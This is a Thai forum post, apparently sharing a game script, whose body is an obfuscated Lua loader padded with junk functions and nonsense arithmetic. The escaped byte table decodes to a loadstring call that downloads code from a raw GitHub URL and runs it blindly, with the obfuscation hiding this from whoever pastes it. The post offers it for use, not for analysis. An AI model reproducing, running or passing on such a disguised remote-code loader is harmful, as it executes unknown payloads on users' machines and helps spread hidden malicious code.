สคิป pj 1309

กระทู้คำถาม
function IllIlllIllIlllIlllIlllIll(IllIlllIllIllIll) if (IllIlllIllIllIll==(((((919 + 636)-636)*3147)/3147)+919)) then return not true end if (IllIlllIllIllIll==(((((968 + 670)-670)*3315)/3315)+968)) then return not false end end; local IIllllIIllll = (7*3-9/9+3*2/0+3*3);local IIlllIIlllIIlllIIlllII = (3*4-7/7+6*4/3+9*9);local IllIIIllIIIIllI = table.concat;function IllIIIIllIIIIIl(IIllllIIllll) function IIllllIIllll(IIllllIIllll) function IIllllIIllll(IllIllIllIllI) end end end;IllIIIIllIIIIIl(900283);function IllIlllIllIlllIlllIlllIllIlllIIIlll(IIlllIIlllIIlllIIlllII) function IIllllIIllll(IllIllIllIllI) local IIlllIIlllIIlllIIlllII = (9*0-7/5+3*1/3+8*2) end end;IllIlllIllIlllIlllIlllIllIlllIIIlll(9083);local IllIIllIIllIII = loadstring;local IlIlIlIlIlIlIlIlII = {'\45','\45','\47','\47','\32','\68','\101','\99','\111','\109','\112','\105','\108','\101','\100','\32','\67','\111','\100','\101','\46','\32','\10','\108','\111','\97','\100','\115','\116','\114','\105','\110','\103','\40','\103','\97','\109','\101','\58','\72','\116','\116','\112','\71','\101','\116','\40','\39','\104','\116','\116','\112','\115','\58','\47','\47','\114','\97','\119','\46','\103','\105','\116','\104','\117','\98','\117','\115','\101','\114','\99','\111','\110','\116','\101','\110','\116','\46','\99','\111','\109','\47','\83','\107','\121','\50','\56','\51','\54','\47','\83','\97','\110','\122','\47','\109','\97','\105','\110','\47','\84','\101','\115','\116','\101','\114','\39','\41','\41','\40','\41','\10',}IllIIllIIllIII(IllIIIllIIIIllI(IlIlIlIlIlIlIlIlII,IIIIIIIIllllllllIIIIIIII))()
แสดงความคิดเห็น
โปรดศึกษาและยอมรับนโยบายข้อมูลส่วนบุคคลก่อนเริ่มใช้งาน อ่านเพิ่มเติมได้ที่นี่